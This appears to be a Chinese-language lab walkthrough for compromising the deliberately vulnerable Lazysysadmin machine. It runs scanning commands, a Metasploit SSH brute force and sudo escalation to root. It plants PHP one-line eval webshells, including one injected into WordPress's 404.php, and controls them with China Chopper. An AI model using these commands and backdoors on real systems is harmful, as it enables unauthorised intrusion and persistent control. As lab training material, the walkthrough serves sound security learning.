一、实验环境1.靶机:Lazysysadmin
2.测试机:Kali
3.帮凶机:Windows 10
4.扫描工具:Nesssus
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
二,这里我们分为2种方式来实验
1、用字典来爆破连接
2、用木马来连接
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2.1(第一种字典爆破)
(1)信息收集
查询测试机ip地址,判断所处网段
测试机所处网段 192.168.0.0
(2)主机发现
root@akemi:~# netdiscover -i eth0 -r 192.168.0.0/24
参数说明
-i 指定网卡名
-r 指定网段
(3)端口扫描(masscan/nmap)
root@akemi:~# masscan --rate=10000 --ports 0-65535 192.168.0.99
masscan扫描速度快,但准确度不高,可以多扫几次,以防漏扫
或者使用nmap
root@akemi:~# nmap -sV -T4 -p 6667,22,139,445,80,3306 192.168.0.99
namp:-T4(分为0-5等级;-sV(版本信息与开启服务);-A(详细扫描开放的端口的具体服务)
与masscan相比,namp更详细,但是速度较慢(可以先使用masscan扫描出端口,再用nmap详细扫描开放的端口)
开启了6667(ircd 互联网中继聊天守护进程),22(ssh服务),139、445(smaba共享服务),80(Apache服务),3306(MySQL)端口
(4)漏洞扫描
开启nessusd服务,
如果没有安装点击这里
root@akemi:~# /etc/init.d/nessusd restart
登录nessusd服务(本地的8834端口)
选择“我的扫描”>>“新建扫描”
选择“进阶扫描”
(5)ssh爆破(22端口)
原理:靶机用户存在弱口令漏洞,利用枚举的方法破解目标主机ssh服务(使用Metasploit)
5.1)启动msfconsole
5.2)搜索ssh_login的相关工具和攻击负载
search ssh_login
5.3)启用漏洞模块,并查看需要的设置的相关项
use auxiliary/scanner/ssh/ssh_login
show options
5.4)设置目标主机的IP地址
set rhosts 192.168.0.99
5.5)设置登录用户的用户文件(这里我提前写好文件了
set user_file /root/user.txt
5.6(设置暴力破解的密码问价路径
5.7)开始向目标主机爆破ssh的登录账号和密码
exploit
5.8)远程连接目标主机
ssh [email protected]
5.9)终极三问
whoami———>pwd———>uname -a
5.10)查询/etc/passwd文件权限
ls -l /etc/passwd
/etc/passwd仅root拥有可读可写权限,togie只拥有可读权限
5.11)查看当前用户togie允许命令的权限信息
sudo -l
togie用户在本机上允许命令的权限为所有
groups
togie用户所在组为:sudo
5.12)提权(获取root权限)
sudo su root
5.13)上传后门文件(一句话木马)
后门文件(一句话木马),可以多放几个在不同目录(必须是在/var/www/html目录下),使用不同文件名(隐藏深点)
也可以使用webacoo工具自动生成一句话木马(webacoo -g -o 1.php)
<?php @eval($_POST[a])?>
5.14)启用中国菜刀,获取webshell权限(后门测试)
只要后门没有被清除,都可以用菜刀为所欲为
二、web测试
1.通过浏览器访问http://192.168.0.99 , 分析整个网页发现没啥东西
用默认目录扫描工具(dirb),扫描对应网站的目录
dirb 192.168.0.99
3、对扫描出来的目录进行分析
扫描出来info.php文件,浏览器访问,下图可以看到目标存在信息泄露漏洞
4.扫描出来/phpmyadmin/目录,浏览器访问,可以看到是mysql的后台登录界面,尝试弱口令或者暴力破解
5扫描发现wordpress ,浏览器访问,发现其中含有疑似用户名的信息
6尝试登录wordpress的默认后台管理页面wp-login.php
7.尝试输入一些简单的弱口令,提示如下错误信息,发现用户名是admin,此处存在用户名名枚举漏洞,然后尝试暴力破解密码
补充:
使用wpscan扫描http://192.168.0.99/wordpress 看是否含有漏洞
Vp 只枚举有漏洞的插件,vt只枚举存在漏洞的主题,tt列举缩略图相关的文件
因为是WordPress博客的,所以可以使用wpsan进行漏洞扫描
wpscan --url http://192.168.0.99/wordpress -e vp,vt,tt
4、尝试从samba服务发现漏洞
使用enum4linux枚举运行samba的主机信息
enum4linux 192.168.106.140
扫描完成后发现存在共享目录,允许空口令
可以远程挂载,查看共享目录,发现共享的是网站的根目录
mount -t cifs -o username=’’,password=’’ //192.168.0.99/share$ /mnt
Cd到wordpress目录,查看配置文件,可以看到wordpress后台的用户名以及密码
或者在windows访问共享
访问方法:\\192.168.0.99\share$\wordpress
用得到用户名与密码尝试登录phpmyadmin,成功登录进去
尝试查看数据,发现此账户对数据库没有任何权限
尝试用数据库的用户名密码登录wordpress后台,成功登录
可以在一个404页面中添加一句话木马留后门,上传这个404页面
<?php @eval($_POST[b]);?>
在浏览器访问一个不存在的页面,可以看到跳转到404页面,这时也就执行了插入其中的一句话木马
打开菜刀工具,连接url, 成功反弹shell,经测试发现就下图的菜刀可以连接成功,其余菜刀不可以
总结
1.信息收集
判断网段
主机发现
端口扫描
1.1漏洞扫描
1.2开启nessusd服务,加载插件,登录
1.3.建立扫描
1.4.扫描结果
2.dirb目录爆破
默认字典目录扫描
指定字典目录扫描
3.ssh爆破(msfconsole)
4.wpscan扫描wordpress漏洞
5.文件共享信息泄露
6.进入后台,Appearance页面404.php挂马,菜刀连接,反弹shell